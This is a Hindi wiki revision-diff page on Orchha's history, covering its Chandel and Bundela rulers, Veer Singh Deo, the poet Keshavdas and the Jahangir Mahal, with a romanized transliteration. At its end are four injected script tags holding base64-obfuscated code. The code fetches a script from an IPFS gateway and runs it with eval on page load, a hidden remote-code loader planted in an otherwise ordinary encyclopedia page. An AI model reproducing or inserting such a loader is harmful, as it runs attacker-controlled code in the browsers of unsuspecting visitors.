Difference between revisions of "ओरछा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Jahangir-Mahal-Orchha.jpg|thumb|250px|जहाँगीर महल, ओरछा]]  
 
[[चित्र:Jahangir-Mahal-Orchha.jpg|thumb|250px|जहाँगीर महल, ओरछा]]  
'''ओरछा''' [[मध्य प्रदेश]] के [[बुन्देलखण्ड]] सम्भाग में [[बेतवा नदी]] के किनारे स्थित आधुनिक मध्य काल में परिहास राजाओं की राजधानी थी।  
+
'''ओरछा''' [[मध्य प्रदेश]] के [[बुन्देलखण्ड]] सम्भाग में [[बेतवा नदी]] के किनारे स्थित आधुनिक [[मध्य काल]] में परिहास राजाओं की राजधानी थी।  
*परिहास राजाओं के बाद में यह [[चन्देल वंश|चन्देलों]] के अधिकार में रहीं।  
+
==इतिहास==
*चन्देल राजाओं के पराभव के बाद ओरछा श्रीहीन हो गया।  
+
परिहास राजाओं के बाद में यह [[चन्देल वंश|चन्देलों]] के अधिकार में रहीं। चन्देल राजाओं के पराभव के बाद ओरछा श्रीहीन हो गया। उसके बाद में बुंदेलों ने ओरछा को राजधानी बनाया और इसने पुनः अपना गौरव प्राप्त किया। राजा रुद्रप्रताप (1501-03ई.) वर्तमान ओरछा को बसाने वाले थे। 1531 ई. में इस नगर की स्थापना की गई और क़िले के निर्माण में आठ वर्ष का समय लगा। ओरछा के महल भारतीचन्द के समय 1539 ई. में बनकर पूर्ण हुए और राजधानी भी इसी वर्ष पुरानी राजधानी गढ़कुंडार से ओरछा लायी गयी।  
*उसके बाद में बुंदेलों ने ओरछा को राजधानी बनाया और इसने पुनः अपना गौरव प्राप्त किया।  
 
*राजा रुद्रप्रताप (1501-03ई.) वर्तमान ओरछा को बसाने वाले थे।  
 
*1531 ई. में इस नगर की स्थापना की गई और क़िले के निर्माण में आठ वर्ष का समय लगा।  
 
*ओरछा के महल भारतीचन्द के समय 1539 ई. में बनकर पूर्ण हुए और राजधानी भी इसी वर्ष पुरानी राजधानी गढ़कुंडार से ओरछा लायी गयी।  
 
  
{{प्रचार}}
+
[[अकबर]] के समय यहां के राजा मधुकर शाह थे जिनके साथ मुग़ल सम्राट के कई युद्ध किए थे। [[जहांगीर]] ने वीरसिंहदेव बुंदेला को जो ओरछा राज्य की बड़ौनी जागीर के स्वामी थे पूरे ओरछा राज्य की गद्दी दी थी। वीरसिंहदेव ने ही अकबर के शासनकाल में जहांगीर के कहने से अकबर के विद्वान् दरबारी [[अबुल फज़ल|अबुलफजल]] की हत्या करवा दी थी। [[शाहजहां]] ने बुन्देलों से कई असफल लड़ाइयां लड़ीं। किंतु अंत में जुझारसिंह को ओरछा का राजा स्वीकार कर लिया गया। [[बुन्देलखण्ड]] की लोक-कथाओं का नायक हरदौल वीरसिंहदेव का छोटा पुत्र एवं जुझारसिंह का छोटा भाई था। [[औरंगजेब]] के राज्यकाल में [[छत्रसाल]] की शक्त् बुंदेलखंड में बढ़ी हुई थी। ओरछा की रियासत वर्तमान काल तक बुंदेलखंड में अपना विशेष महत्त्व रखती आई है। यहाँ के राजाओं ने [[हिन्दी]] के [[कवि|कवियों]] को सदा प्रश्रय दिया है। महाकवि [[केशवदास]] वीरसिंहदेव के राजकवि थे।
 +
==ऐतिहासिक इमारते==
 +
ओरछे में जिन पुरानी इमारतों के खंडहर हैं, उनमें मुख्य हैं- जहांगीर-महल जिसे वीरसिंहदेव ने जहांगीर के लिए बनवाया था यद्यपि जहांगीर इस महल में वीरसिंहदेव के जीवनकाल में कभी न ठहर सका, केशवदास का भवन, प्रवीण राय का भवन (प्रवीण राय, वीरसिंह देव के दरबार की प्रसिद्ध गायिका थी जिसकी केशवदास ने अपने ग्रंथों में बहुत प्रशंसा की है)।
 +
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 30: Line 29:
 
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ऐतिहासिक स्थान]][[Category:इतिहास कोश]]
 
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ऐतिहासिक स्थान]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:50, 16 July 2012

thumb|250px|jahaangir mahal, orachha orachha madhy pradesh ke bundelakhand sambhag mean betava nadi ke kinare sthit adhunik madhy kal mean parihas rajaoan ki rajadhani thi.

itihas

parihas rajaoan ke bad mean yah chandeloan ke adhikar mean rahian. chandel rajaoan ke parabhav ke bad orachha shrihin ho gaya. usake bad mean buandeloan ne orachha ko rajadhani banaya aur isane punah apana gaurav prapt kiya. raja rudrapratap (1501-03ee.) vartaman orachha ko basane vale the. 1531 ee. mean is nagar ki sthapana ki gee aur qile ke nirman mean ath varsh ka samay laga. orachha ke mahal bharatichand ke samay 1539 ee. mean banakar poorn hue aur rajadhani bhi isi varsh purani rajadhani gadhakuandar se orachha layi gayi.

akabar ke samay yahaan ke raja madhukar shah the jinake sath mugal samrat ke kee yuddh kie the. jahaangir ne virasianhadev buandela ko jo orachha rajy ki b dauni jagir ke svami the poore orachha rajy ki gaddi di thi. virasianhadev ne hi akabar ke shasanakal mean jahaangir ke kahane se akabar ke vidvanh darabari abulaphajal ki hatya karava di thi. shahajahaan ne bundeloan se kee asaphal l daiyaan l dian. kiantu aant mean jujharasianh ko orachha ka raja svikar kar liya gaya. bundelakhand ki lok-kathaoan ka nayak haradaul virasianhadev ka chhota putr evan jujharasianh ka chhota bhaee tha. aurangajeb ke rajyakal mean chhatrasal ki shakth buandelakhand mean badhi huee thi. orachha ki riyasat vartaman kal tak buandelakhand mean apana vishesh mahattv rakhati aee hai. yahaan ke rajaoan ne hindi ke kaviyoan ko sada prashray diya hai. mahakavi keshavadas virasianhadev ke rajakavi the.

aitihasik imarate

orachhe mean jin purani imaratoan ke khandahar haian, unamean mukhy haian- jahaangir-mahal jise virasianhadev ne jahaangir ke lie banavaya tha yadyapi jahaangir is mahal mean virasianhadev ke jivanakal mean kabhi n thahar saka, keshavadas ka bhavan, pravin ray ka bhavan (pravin ray, virasianh dev ke darabar ki prasiddh gayika thi jisaki keshavadas ne apane granthoan mean bahut prashansa ki hai).


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>